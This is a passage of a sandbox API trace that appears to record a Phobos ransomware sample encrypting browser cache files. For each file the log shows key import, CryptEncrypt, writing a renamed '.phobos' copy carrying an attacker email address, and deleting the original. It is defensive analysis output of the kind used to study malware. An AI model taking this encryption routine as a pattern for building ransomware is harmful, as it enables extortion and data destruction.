hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.291] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.291] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.291] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.291] CloseHandle (hObject=0x158) returned 1 [0168.291] CloseHandle (hObject=0x190) returned 1 [0168.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini")) returned 1 [0168.292] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.292] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0168.292] CloseHandle (hObject=0x190) returned 1 [0168.293] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini")) returned 0x2026 [0168.293] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.293] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.293] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.293] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0168.297] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0168.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.302] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.302] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.302] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.302] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.302] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.302] CloseHandle (hObject=0x190) returned 1 [0168.302] CloseHandle (hObject=0x158) returned 1 [0168.302] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\desktop.ini")) returned 1 [0168.303] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.304] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=294804) returned 1 [0168.304] CloseHandle (hObject=0x158) returned 1 [0168.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat")) returned 0x2020 [0168.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.304] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.304] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.314] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.314] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.314] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x47f94, lpOverlapped=0x0) returned 1 [0168.416] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x47fa0, dwBufLen=0x47fa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x47fa0) returned 1 [0168.419] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x47fa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x47fa0, lpOverlapped=0x0) returned 1 [0168.425] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0168.425] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.425] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80, dwBufLen=0x80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80) returned 1 [0168.425] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0168.425] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x132, lpOverlapped=0x0) returned 1 [0168.425] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.426] CloseHandle (hObject=0x158) returned 1 [0168.426] CloseHandle (hObject=0x190) returned 1 [0168.426] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat")) returned 1 [0168.429] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0168.455] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=654) returned 1 [0168.455] CloseHandle (hObject=0x17c) returned 1 [0168.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png")) returned 0x2020 [0168.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0168.455] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.455] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.456] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0168.456] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.456] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x28e, lpOverlapped=0x0) returned 1 [0168.546] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290, dwBufLen=0x290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290) returned 1 [0168.546] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x290, lpOverlapped=0x0) returned 1 [0168.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0168.547] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.547] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.547] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.547] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.547] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0168.547] CloseHandle (hObject=0x17c) returned 1 [0168.547] CloseHandle (hObject=0x130) returned 1 [0168.547] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3vova[1].png")) returned 1 [0168.548] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.548] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=401) returned 1 [0168.548] CloseHandle (hObject=0x130) returned 1 [0168.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png")) returned 0x2020 [0168.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.549] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.549] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0168.549] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0168.549] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.549] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x191, lpOverlapped=0x0) returned 1 [0169.025] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0) returned 1 [0169.025] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a0, lpOverlapped=0x0) returned 1 [0169.026] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0169.026] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0169.026] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0169.026] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.026] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0169.026] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0169.026] CloseHandle (hObject=0x130) returned 1 [0169.026] CloseHandle (hObject=0x17c) returned 1 [0169.026] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png")) returned 1 [0169.027] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0169.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0169.110] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=413) returned 1 [0169.111] CloseHandle (hObject=0x17c) returned 1 [0169.111] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png")) returned 0x2020 [0169.111] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0169.111] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0169.111] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0169.111] CreateFileW 